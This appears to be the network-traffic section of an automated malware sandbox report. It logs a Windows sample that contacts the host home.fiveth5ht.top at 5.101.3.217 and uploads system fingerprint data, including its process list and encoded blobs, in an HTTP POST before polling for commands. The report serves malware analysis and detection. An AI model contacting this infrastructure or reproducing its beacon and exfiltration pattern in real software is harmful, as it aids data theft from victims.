                                                            Dec 27, 2024 15:05:56.884254932 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:57.000418901 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000438929 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000447035 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000454903 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000667095 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000675917 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000809908 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000818968 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000827074 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000843048 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000987053 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001105070 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001121044 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001130104 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001137972 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001147032 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001156092 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001163960 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001451015 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001460075 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001468897 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001477003 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001486063 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001502037 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001509905 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001523972 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001795053 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001804113 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001813889 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001821995 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001831055 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001847029 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001990080 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002271891 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002279997 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002289057 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002293110 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002295971 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002299070 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002583027 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002727032 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002743006 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002762079 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002770901 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002891064 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002899885 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003021002 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003031015 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003038883 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003047943 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003170967 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003179073 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003300905 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003309965 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003810883 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004450083 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004467010 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004476070 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004486084 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004606962 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004762888 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004771948 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004823923 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004832983 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004848957 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004991055 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005000114 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005116940 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005125999 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005135059 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005143881 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005264997 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005273104 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005296946 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005305052 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005429983 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005561113 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005569935 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005578041 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005587101 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005601883 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005724907 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005733967 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005897999 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005907059 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006030083 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006040096 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006047964 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006057978 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006076097 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006083965 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006094933 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006112099 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006119967 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006129026 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:59.732152939 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:59.732280970 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:59.732352018 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:59.732820988 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:59.852303982 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:59.949297905 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:00.068989992 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:00.069154024 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:00.069539070 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:00.188983917 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.615854979 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.616005898 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.616079092 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:01.616487980 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:01.736109018 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.823007107 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:01.942562103 CET80497095.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.942641973 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:01.943034887 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:02.062633991 CET80497095.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:03.546766996 CET80497095.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:03.547223091 CET80497095.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:03.547290087 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:03.547457933 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:03.666865110 CET80497095.101.3.217192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 15:05:50.857191086 CET | 63677 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 15:05:50.857289076 CET | 63677 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 15:05:50.994185925 CET | 53 | 63677 | 1.1.1.1 | 192.168.2.7
Dec 27, 2024 15:05:50.994798899 CET | 53 | 63677 | 1.1.1.1 | 192.168.2.7
Dec 27, 2024 15:05:54.924309969 CET | 63680 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 15:05:54.924438953 CET | 63680 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 15:05:55.329128981 CET | 53 | 63680 | 1.1.1.1 | 192.168.2.7
Dec 27, 2024 15:05:55.344059944 CET | 53 | 63680 | 1.1.1.1 | 192.168.2.7
Dec 27, 2024 15:05:59.809948921 CET | 64123 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 15:05:59.809948921 CET | 64123 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 15:05:59.948041916 CET | 53 | 64123 | 1.1.1.1 | 192.168.2.7
Dec 27, 2024 15:05:59.948061943 CET | 53 | 64123 | 1.1.1.1 | 192.168.2.7
Dec 27, 2024 15:06:01.677577972 CET | 64125 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 15:06:01.677731991 CET | 64125 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 15:06:01.821624994 CET | 53 | 64125 | 1.1.1.1 | 192.168.2.7
Dec 27, 2024 15:06:01.821644068 CET | 53 | 64125 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 15:05:50.857191086 CET | 192.168.2.7 | 1.1.1.1 | 0x5f24 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:05:50.857289076 CET | 192.168.2.7 | 1.1.1.1 | 0xdb89 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 27, 2024 15:05:54.924309969 CET | 192.168.2.7 | 1.1.1.1 | 0xc8e | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:05:54.924438953 CET | 192.168.2.7 | 1.1.1.1 | 0x8ba8 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 15:05:59.809948921 CET | 192.168.2.7 | 1.1.1.1 | 0xeb41 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:05:59.809948921 CET | 192.168.2.7 | 1.1.1.1 | 0xc35c | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 15:06:01.677577972 CET | 192.168.2.7 | 1.1.1.1 | 0x288 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:06:01.677731991 CET | 192.168.2.7 | 1.1.1.1 | 0x55f3 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 15:05:50.994798899 CET | 1.1.1.1 | 192.168.2.7 | 0x5f24 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:05:50.994798899 CET | 1.1.1.1 | 192.168.2.7 | 0x5f24 | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:05:55.329128981 CET | 1.1.1.1 | 192.168.2.7 | 0xc8e | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:05:59.948061943 CET | 1.1.1.1 | 192.168.2.7 | 0xeb41 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:06:01.821624994 CET | 1.1.1.1 | 192.168.2.7 | 0x288 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
• httpbin.org
• home.fiveth5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 5.101.3.217 | 80 | 6528 | C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 27, 2024 15:05:55.667896986 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 443147
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 30 39 31 35 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914009152", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                                            Dec 27, 2024 15:05:55.787642002 CET | 2472 | OUT | Data Raw: 47 71 64 43 76 54 64 70 30 36 6e 68 6e 34 76 78 6b 75 71 61 76 77 42 61 55 5a 4c 33 6f 7a 69 33 47 55 57 70 52 62 69 30 33 5c 2f 41 47 76 44 39 6e 58 39 4d 61 70 54 6a 56 70 2b 44 38 5a 30 35 4b 36 6c 48 78 44 38 4b 35 4a 5c 2f 64 78 78 64 4e 62
                                                            Data Ascii: GqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD9nX9MapTjVp+D8Z05K6lHxD8K5J\/dxxdNbNNJxd00mj8h6K\/Zm2\/4JKC4\/5uB2f90p3f+9JX\/OPWvyi+JHhA\/D34h+PfALagNWPgfxp4p8IHVRamxGpnw1rl9op1AWRuLs2YvTZfaRam7uvs\/meV9om2eY37R4K\/Su8AfpEZlnWT+DvHv+uGY8O4HD5n
                                                            Dec 27, 2024 15:05:55.787709951 CET | 7416 | OUT | Data Raw: 2f 55 72 48 5a 35 6a 75 50 2b 32 63 6b 59 35 39 5c 2f 77 44 50 30 2b 6c 4e 69 33 79 65 54 5c 2f 41 6e 5c 2f 54 50 6a 5c 2f 4f 66 38 38 56 4b 32 5a 4e 36 66 2b 51 5c 2f 38 66 72 5c 2f 6e 69 6f 63 66 77 66 78 2b 56 35 55 76 37 72 5c 2f 6c 33 5c 2f
                                                            Data Ascii: /UrHZ5juP+2ckY59\/wDP0+lNi3yeT\/An\/TPj\/Of88VK2ZN6f+Q\/8fr\/niocfwfx+V5Uv7r\/l3\/z09MV0GhD5m7\/bEkX737R\/n\/D2oWOfbvHz+Z+6lH\/Lf\/PHb+dPk2EIn8ccvPl\/l6f5\/GnyZ2u7\/I\/\/AEzi\/wAfx96DoKbR87N8f1\/z+nXtULF5NiZ\/Hyv8P8\/Wrk0f7zZzs8rzf8cdP61T\/wBW
                                                            Dec 27, 2024 15:05:55.787775993 CET | 2472 | OUT | Data Raw: 35 66 71 64 56 4f 70 38 72 66 68 5c 2f 77 4e 2b 6d 70 43 7a 65 5a 49 2b 39 4e 6c 74 4a 5c 2f 77 41 39 50 39 66 6a 32 36 66 35 2b 6d 61 68 57 54 79 39 37 37 50 6b 38 33 7a 63 66 6c 2b 66 66 50 4e 45 71 75 76 7a 75 6b 63 50 6d 66 38 41 50 54 39 2b
                                                            Data Ascii: 5fqdVOp8rfh\/wN+mpCzeZI+9NltJ\/wA9P9fj26f5+mahWTy977Pk83zcfl+ffPNEquvzukcPmf8APT9+f8\/596fueKPf52zy5fK7+fN2rQ2Ief3KRpI+\/wBeP0\/+vVbd5Z\/57eXz\/wBMO\/5\/l+uKm+Ty3Xf6+bH5Xk\/l\/n8KPnbfD0\/e\/wDPLr+v06VPv\/3fxAhb++vl\/wDPXy5Jv9V\/06\/59fSjy\/3cy
                                                            Dec 27, 2024 15:05:55.787796974 CET | 2472 | OUT | Data Raw: 76 37 61 53 4f 61 78 75 5a 59 5a 6f 72 71 7a 75 59 6d 6a 6d 6a 6e 30 71 59 4b 30 39 70 50 43 7a 78 79 4a 63 51 79 77 53 6f 7a 71 32 35 63 69 76 34 4d 2b 6b 6a 78 33 53 38 50 65 4e 4b 75 42 7a 54 4b 6f 35 31 77 5c 2f 78 64 6c 33 44 47 63 34 7a 41
                                                            Data Ascii: v7aSOaxuZYZorqzuYmjmjn0qYK09pPCzxyJcQywSozq25civ4M+kjx3S8PeNKuBzTKo51w\/xdl3DGc4zAVKGMh7TE5FmWJoVI4LMKOIw1HC4uvhcDTwuK55V5fVKtKUqGlGR\/p79D\/gGv4n+G7x2UZrHI+KODM24uyDA5rCvgqlTC4PiHLMDjKVTGZbXoYqvisJRxmYVsRhHGnh4PFUcRTjiE3Wifmp+xT8TPib8RvBfxhHi
                                                            Dec 27, 2024 15:05:55.787820101 CET | 2472 | OUT | Data Raw: 41 78 4e 53 71 38 4e 54 7a 42 5c 2f 36 61 35 6a 34 65 34 2b 32 51 35 62 78 52 34 61 35 6e 34 68 31 75 45 63 46 68 73 6b 34 66 34 6e 79 44 69 33 4b 73 69 77 32 64 63 50 5a 66 69 63 4e 69 38 6f 77 50 47 32 55 5a 6c 6e 2b 51 54 71 7a 77 74 66 42 34
                                                            Data Ascii: AxNSq8NTzB\/6a5j4e4+2Q5bxR4a5n4h1uEcFhsk4f4nyDi3Ksiw2dcPZficNi8owPG2UZln+QTqzwtfB4LEY3D08JxFl2IxuHqZhhqdP6zUwC539pjxbaftUft5\/srfs2fDK4i8Qab+y58R7b9pP4\/+J9NZLnSfBeteCpbd\/A\/g651CPMf9v3WqK9hq2kwvLLBJr9gk6rLpGuppn5O\/8FWDn9uT4tD+7pXwwH\/mLfBx\
                                                            Dec 27, 2024 15:05:55.787846088 CET | 2472 | OUT | Data Raw: 64 79 68 54 65 6d 50 39 5a 5c 2f 6e 5c 2f 50 66 6f 54 55 4c 52 5c 2f 50 35 4f 7a 7a 6e 6b 5c 2f 77 43 32 5c 2f 76 78 5c 2f 6e 36 31 63 62 5a 73 2b 5c 2f 47 69 66 36 71 53 54 5c 2f 77 42 74 63 64 65 6e 72 39 4b 68 2b 63 52 75 6d 2b 4e 33 6b 37 69
                                                            Data Ascii: dyhTemP9Z\/n\/PfoTULR\/P5Ozznk\/wC2\/vx\/n61cbZs+\/Gif6qST\/wBtcdenr9Kh+cRum+N3k7iK19P8f8+nQdBWk2eU8Sf8s\/8AWx\/8tx3\/ANLu8+nHtTJI1WZ0\/ebJP+Wkn7+fr\/L+dTAfu4U2XH\/bP9\/b\/n\/npTP77\/vE7+Z\/7a\/546UHQQ+X5iv5KfPnzR+6+vI\/z+GaI4\/ufPGPM\/5Z+V\/5
                                                            Dec 27, 2024 15:05:55.787957907 CET | 2472 | OUT | Data Raw: 34 48 45 52 74 57 77 4f 59 55 73 4a 6a 73 4a 58 6a 31 56 58 44 59 6d 4e 57 6a 56 6a 5a 37 54 68 4a 61 2b 5a 34 6d 56 34 7a 69 4c 49 4d 62 52 7a 58 4a 4d 56 6e 57 53 35 6a 68 5a 4b 57 48 7a 4c 4b 36 32 4f 79 37 47 34 65 62 61 73 36 4f 4d 77 6b 71
                                                            Data Ascii: 4HERtWwOYUsJjsJXj1VXDYmNWjVjZ7ThJa+Z4mV4ziLIMbRzXJMVnWS5jhZKWHzLK62Oy7G4ebas6OMwkqNejJvls4VItu1uh9reGf20\/i1omnT6Vq1zH4ksJ7WS1ZL2QRzYdCgf7RPBfsnl5ysVqLWED5TGQF2+GeKPiz4w8WvKt\/qdxFYyFsafHM0FoEPRJIYBDBNtHAkkh39csSzbvJtA1LSfFPjL4f+A9E8Q+F28Q\/Ev
                                                            Dec 27, 2024 15:05:55.787980080 CET | 2472 | OUT | Data Raw: 39 6f 32 6d 58 74 31 5a 54 33 4f 6a 33 75 70 61 56 4a 5a 36 6a 64 50 72 37 5c 2f 41 43 76 4d 38 42 6e 57 58 59 4c 4e 73 71 78 56 4c 48 5a 62 6d 4f 47 70 59 7a 41 34 79 67 32 36 4f 4a 77 74 65 43 71 55 61 39 4a 74 4a 75 6e 55 67 31 4b 4c 73 72 70
                                                            Data Ascii: 9o2mXt1ZT3Oj3upaVJZ6jdPr7\/ACvM8BnWXYLNsqxVLHZbmOGpYzA4yg26OJwteCqUa9JtJunUg1KLsrppn5TnGT5nw\/muYZJnODrZfm2VYutgcxwOIUVXwmLw83Tr4esoylFVKU04zSk7STXQKa\/3T+H8xTq53x94s8HfDbwBY+NPGHxL+FvhvXvEXhDWviH4E+E3iDWvG9n8SPiB4A0HxXrHgq\/8WeHbrTfhxrPwq063f
                                                            Dec 27, 2024 15:05:55.907398939 CET | 4944 | OUT | Data Raw: 76 34 6a 4b 6a 6b 37 66 6a 5c 2f 41 45 71 53 69 67 6f 72 30 56 4a 5c 2f 79 30 5c 2f 7a 5c 2f 64 71 4f 67 41 71 4f 54 74 2b 50 39 4b 6b 6f 6f 4f 67 72 30 55 55 55 41 4e 66 37 70 5c 2f 44 2b 59 71 47 72 46 52 50 31 5c 2f 44 2b 70 6f 4f 67 5a 52 52
                                                            Data Ascii: v4jKjk7fj\/AEqSigor0VJ\/y0\/z\/dqOgAqOTt+P9KkooOgr0UUUANf7p\/D+YqGrFRP1\/D+poOgZRRRQBC\/3j+H8hTae\/X8P6mmUHQRmP0\/EH\/P6YqF\/un8P5irVQv8AeP4fyFAFWipn+6fw\/mKZt+XPfr+H+ef0roOgZUL\/AHj+H8hU1FAFein7D7f5\/CmlSv8A9ag6BKr1YqE9X\/H\/ANCFBpT6\/L9RtV6s
                                                            Dec 27, 2024 15:05:55.907483101 CET | 4944 | OUT | Data Raw: 38 61 4c 4c 39 76 6a 51 76 69 48 38 56 66 47 48 6a 54 34 76 65 4e 50 48 58 67 4c 34 76 66 43 32 79 2b 43 5c 2f 69 47 39 5c 2f 59 30 38 66 36 78 66 65 41 4e 65 38 41 36 44 34 56 31 76 39 71 48 77 4a 6f 6e 78 46 2b 46 66 69 7a 34 64 77 57 4e 72 72
                                                            Data Ascii: 8aLL9vjQviH8VfGHjT4veNPHXgL4vfC2y+C\/iG9\/Y08f6xfeANe8A6D4V1v9qHwJonxF+Ffiz4dwWNrrEnhHT\/BtzpHrs\/h3w\/dSNNc6Fo9xM33pZ9MspZG\/3nkgZj+Jo\/4R7QA6SDQ9HEkZzG\/9mWW+MnqUbyNyk4HKkHivVq\/RByivmmU5hV4xznkynMcxx8KdKnhaVfFf2lmFPHVsPisZ7CdevRpqnGjT+tyxla
                                                            Dec 27, 2024 15:05:59.732152939 CET | 157 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 14:05:59 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 1
                                                            Connection: close
                                                            Data Raw: 30
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.7 | 49703 | 5.101.3.217 | 80 | 6528 | C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 27, 2024 15:06:00.069539070 CET | 98 | OUT | GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Dec 27, 2024 15:06:01.615854979 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 14:06:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 207
                                                            Connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.7 | 49709 | 5.101.3.217 | 80 | 6528 | C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            Timestamp | Bytes transferred | Direction | Data
